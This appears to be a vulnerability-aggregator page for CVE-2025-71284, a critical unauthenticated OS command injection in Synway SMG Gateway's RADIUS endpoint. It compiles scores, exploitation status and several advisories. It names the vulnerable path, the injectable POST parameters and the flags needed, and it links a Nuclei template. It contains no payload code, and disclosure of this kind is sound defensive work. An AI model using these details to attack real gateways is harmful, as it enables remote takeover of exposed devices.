CVE-2025-71284
published 2026-04-30CVE-2025-71284: Synway SMG Gateway Management Software contains an OS command injection vulnerability in the RADIUS configuration endpoint at /en/9-2radius.php where the…
PriorityP189critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWVulnCheck KEV
Exploited in the wild
EPSS
5.73%
92.1th percentile
Synway SMG Gateway Management Software contains an OS command injection vulnerability in the RADIUS configuration endpoint at /en/9-2radius.php where the radius_address POST parameter is split and interpolated directly into a sed command without sanitization. An unauthenticated remote attacker can inject arbitrary shell commands by submitting a POST request with crafted radius_address, radius_address2, shared_secret2, source_ip, timeout, or retry parameters along with save=1 and enable_radius=1 to achieve remote code execution. Exploitation evidence was first observed by the Shadowserver Foundation on 2025-07-11 (UTC).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| synway_information_engineering_co_ltd | synway_smg_gateway_management_software | — | — |
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Synway SMG Gateway Management Software 2025-07-11 RADIUS Configuration Endpoint /en/9-2radius.php os command injection
vuldb·2026-04-30·CVSS 9.3
CVE-2025-71284 [CRITICAL] Synway SMG Gateway Management Software 2025-07-11 RADIUS Configuration Endpoint /en/9-2radius.php os command injection
A vulnerability, which was classified as critical, has been found in Synway SMG Gateway Management Software 2025-07-11. The affected element is an unknown function of the file /en/9-2radius.php of the component RADIUS Configuration Endpoint. Performing a manipulation of the argument radius_address/radius_address2/shared_secret2/source_ip/timeout/retry results in os command injection.
This vulnerability was named CVE-2025-71284. The attack may be initiated remotely. There is no available exploit.
GHSA
GHSA-8mvw-jrmp-qqqj: Synway SMG Gateway Management Software contains an OS command injection vulnerability in the RADIUS configuration endpoint at /en/9-2radius
ghsa_unreviewed·2026-04-30
CVE-2025-71284 [CRITICAL] CWE-78 GHSA-8mvw-jrmp-qqqj: Synway SMG Gateway Management Software contains an OS command injection vulnerability in the RADIUS configuration endpoint at /en/9-2radius
Synway SMG Gateway Management Software contains an OS command injection vulnerability in the RADIUS configuration endpoint at /en/9-2radius.php where the radius_address POST parameter is split and interpolated directly into a sed command without sanitization. An unauthenticated remote attacker can inject arbitrary shell commands by submitting a POST request with crafted radius_address, radius_address2, shared_secret2, source_ip, timeout, or retry parameters along with save=1 and enable_radius=1 to achieve remote code execution. Exploitation evidence was first observed by the Shadowserver Foundation on 2025-07-11 (UTC).
VulnCheck
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2025·CVSS 9.3
CVE-2025-71284 [CRITICAL] Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Synway SMG Gateway Management Software contains an OS command injection vulnerability in the RADIUS configuration endpoint at /en/9-2radius.php where the radius_address POST parameter is split and interpolated directly into a sed command without sanitization. An unauthenticated remote attacker can inject arbitrary shell commands by submitting a POST request with crafted radius_address, radius_address2, shared_secret2, source_ip, timeout, or retry parameters along with save=1 and enable_radius=1 to achieve remote code execution. Exploitation evidence was first observed by the Shadowserver Foundation on 2025-07-11 (UTC).
Required Action: Apply remediations or mitigations per vendor instructions or di
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/synway/synwaysmg-radius-rce.yamlhttps://mp.weixin.qq.com/s/PyepoFSuQ63E3RnpQa9nsAhttps://mrxn.net/jswz/synway-9-2radius-rce.htmlhttps://www.synway.net/https://www.vulncheck.com/advisories/synway-smg-gateway-management-software-os-command-injection-via-radius-address
2026-04-30
Published
Exploited in the wild